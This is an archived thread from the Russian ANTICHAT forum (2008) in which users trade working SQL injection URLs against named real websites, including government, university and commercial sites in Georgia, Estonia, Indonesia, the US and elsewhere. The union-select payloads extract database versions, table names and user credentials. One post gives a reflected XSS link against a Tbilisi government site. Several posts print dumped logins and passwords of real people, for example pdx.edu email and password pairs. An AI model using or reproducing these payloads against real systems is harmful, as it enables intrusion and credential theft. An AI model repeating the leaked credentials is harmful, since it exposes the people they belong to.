ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.08.2008, 20:16
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Valgamaa.ee - PR 5
http://turism.valgamaa.ee/index.php?id=2399999%20union+select+1,2,3,table_na me,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42+from+information_schema.tables--&nfo=2
5 ver. tables
http://turism.valgamaa.ee/index.php?id=2399999%20union+select+1,2,3,email,pw ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42+from+kasutajad--&nfo=2
Canallatino.tv - PR 4
http://www.canallatino.tv/x2/index.php?id=2&seccion=3¬icia=1+union+select+1, unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16
Pangkalpinang.go.id - PR 3
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+24,1/*
Elhacker.org - PR 3
http://www.elhacker.org/index.php?Ver=Seccion&Id=5+and+1=0+union+select+1, 2,version(),4,5,6/*
Elincom.gr
http://www.elincom.gr/el/page.php?id=-81+union+select+1,version()+from+users/*
Последний раз редактировалось sabe; 08.08.2008 в 07:53..
|
|
|
07.08.2008, 21:33
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
www.edu.ru - Российское образование. Федеральный образовательный портал: учреждения, программы, стандарты
http://www.edu.ru/abitur/index.php?act=3&ds=1&isn=-1+union+select+@@version,2,3,4--
|
|
|
|
07.08.2008, 22:45
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
|
|
|
|
07.08.2008, 22:48
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
www.sport-moda.ru
Уязвимость в скрипте показа новостей:
http://www.sport-moda.ru/news/view_new.php?id=1'
Колонки:
http://www.sport-moda.ru/news/view_new.php?id=-286+union+select+1,2,3/*
Информация о базе:
u15055
5.0.45-log
u15055@10.10.10.131
|
|
|
|
07.08.2008, 22:48
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
BanQui
таким способом узнается версия в mssql
@@version тоже самое что и version() просто для каждой системы свои запросы )
$p01nt
жаль нельзя аватарки заливать (
Последний раз редактировалось sabe; 07.08.2008 в 23:51..
|
|
|
|
07.08.2008, 22:52
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Сообщение от BanQui
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
потому что это MSSQL в MSSQL так и узнаётся версия )
|
|
|
|
08.08.2008, 00:15
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.sephiroth.it PR 4
4 ветка слепая скуль)
http://www.sephiroth.it/file_detail.php?id=-139+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11
http://www.infn.it если верить гуглу,то PR 8
и опять blind...
version=5
http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35
http://www.hvar.is PR 6
version = 5 blind sql
http://www.hvar.is/sida.php?id=5+and+5=substring(version(),1,1)
http://www.ethics.utoronto.ca PR 5
version = 3
http://www.ethics.utoronto.ca/index.php?nid=20+and+substring(version(),1,1)=3/*&id=20
всем удачного вечера =) HF & GL
|
|
|
|
08.08.2008, 06:32
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Грузинские Сайты в тему:
http://www.tbilisi.gov.ge/index.php?Post=1%22%3E%20%3Cscript%3Ealert(/suki/)%3C/script%3E&sec_id=337&lang_id=DEU
Aversi.ge
http://www.aversi.ge/main.php?lang=geo&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,version(),17,18,19,20,21,22,23/*
Presa.ge
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,table_name),4,5, 6,7,8,9,10,11+from+information_schema.tables+limit +17,1--
5 ver. tables
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,user_username,us er_password),4,5,6,7,8,9,10,11+from+users--
Ssa.gov.ge
http://www.ssa.gov.ge/index.php?id=69&mid=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25
Flowers.ge
http://www.flowers.ge/fwpopup.php?fwid=-%2015+union+select+1,2,3,concat(char(60,115,116,97 ,114,116,62),table_name,char(58),column_name,char( 60,47,115,116,97,114,116,62)),5,6,7+from+INFORMATI ON_SCHEMA.COLUMNS+limit+0,1/*
Zona.ge
http://site.zona.ge/movies_form.php?name=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21+from+information_schem a.tables+limit+17,1--
5 ver tables...
DVV-international.ge
http://dvv-international.ge/dvv/index.php?sector=view_content&catid=-1+union+select+1,unhex(hex(table_name)),3,unhex(he x(table_schema))+from+information_schema.tables/*
Group.ge
http://group.ge/show.php?id_series=-1+union+select+1,concat(table_name,char(58),column _name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.columns--
5 ver. tables
http://group.ge/show.php?id_series=-1+union+select+1,concat(name,char(58),pass),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+test.na_users--
admin; 1234
Tvali.ge
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+ union+select+1,2,table_name,4,5,6,7,8,9,10,11+from +information_schema.tables/*
5 ver. tables
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+ union+select+1,2,concat_ws(0x3a,user_name,password ),4,5,6,7,8,9,10,11+from+tvali.co_user/*
Prschool.ge
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,tab le_name+from+information_schema.tables--
5 ver, tables..
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,username,user_password)+from+f_users--
юзеры..
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,name,passwd)+from+user--
admin.. но куда это все вводить я не искал..... язык не приемлев, а так кому интересно... смотрите.. если что в ПМ.
Superfootball.ge
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+17,1--
5 ver. tabels
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7+from+pluserdata--
Photo.ge
http://www.photo.ge/profile.php?pform=1'
все.. разкручивайте. ушел спать )
Последний раз редактировалось sabe; 08.08.2008 в 08:03..
|
|
|
|
08.08.2008, 11:40
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
завтрак:
http://www.arc.pdx.edu/dev/chemmap/content/mapsearch.php?getvariablename=7
Dbname:chemmap2
User:chemmap_l@bestla.oit.pdx.edu
Version:5.0.37
users
email assword
sreed@pdx.edu:chemmap
class1:summer2007
class2:summer2007
nehal@pdx.edu:7623e2
amitk@pdx.edu:a9f2b8
savyak@pdx.edu:letmein
|
|
|
|
08.08.2008, 12:17
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://orlandokids.org/latest_infoDetails.php?id=-21+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
Код:
http://www.somachlaw.com/attorneys_bio.php?id=-12+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Код:
http://www.uplandsgallery.com/artists_details.php?id=-12+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
Код:
http://www.screenroom.co.uk/php/id.asp?id=-1+union+select+1,2,user(),4,database(),version(),7,8,9,10,11,12,13--
Код:
http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
Код:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8+from+users--
Код:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password,0x3a,id),4,5,6,7,8+from+blog--
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,email),3,4,5+from+users/*
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-1+union+select+convert(concat_ws(0x3a,user,password)+using+latin1),2,3,4+from+mysql.user/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
